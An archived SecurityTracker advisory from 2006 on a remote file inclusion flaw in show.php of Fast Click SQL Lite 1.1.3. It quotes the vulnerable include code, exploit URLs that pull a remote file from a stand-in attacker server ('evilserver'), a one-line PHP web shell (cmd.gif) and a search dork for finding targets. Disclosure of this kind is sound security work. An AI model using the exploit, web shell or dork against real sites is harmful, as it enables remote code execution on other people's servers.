SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Fast Click SQL Lite Vendors:   FtrainSoft, Inc.
Fast Click SQL Lite Include File Bug in 'show.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016022
SecurityTracker URL:  http://securitytracker.com/id/1016022
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 3 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1.3 and prior versions
Description:   R@1D3N (amin emami) reported a vulnerability in Fast Click SQL Lite. A remote user can include and execute arbitrary code on the target system.

The 'show.php' script does not properly validate user-supplied input in the 'path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[path]/show.php?path=http://[attacker]/cmd.gif?&cmd=uname -a

The original advisory is available at:

http://www.aria-security.net/advisory/fc/fastclicksqllite.txt

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ftrain.siteburg.com/fclicksql.html (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Tue, 2 May 2006 12:12:25 -0700 (PDT)
Subject:  Fast Click SQL Lite <= 1.1.3 Remote File Inclusion

Fast Click SQL Lite  <= 1.1.3 Remote File Inclusion
-------------------------------------------------------
Aria-security.com advisory
Bug Discovered by R@1D3N (amin emami)
email:AminRayden@yahoo.com and rayden@aria-security.net
Date:02/05/2006
original advisory:http://www.aria-security.net/advisory/fc/fastclicksqllite.txt
--------------------------------------------------------
Affected software description:
Fast Click SQL Lite  <= 1.1.3
Vendor:http://www.ftrain.siteburg.com/fclicksql.html
Vulnerability: remote file inclusion
Dork:inurl:"fclick.php?id"
---------------------------------------------------------
Disscution:
The bug reside in show.php

Vulnerable Code:
$CFG['SDIR'] = $path;
$CFG['CDIR'] = $CFG['SDIR']."./common";
require_once($CFG['CDIR']."/error.php");
require_once($CFG['CDIR']."/init.php");

Exploitation example:
http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a

---------------------------------------------------------
cmd.gif
-----------
<?
system($cmd);
?>
-----------

* Fix *:
 
Contact the Vendor


===========================================================
Aria Security Research
Http://www.aria-security.net
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC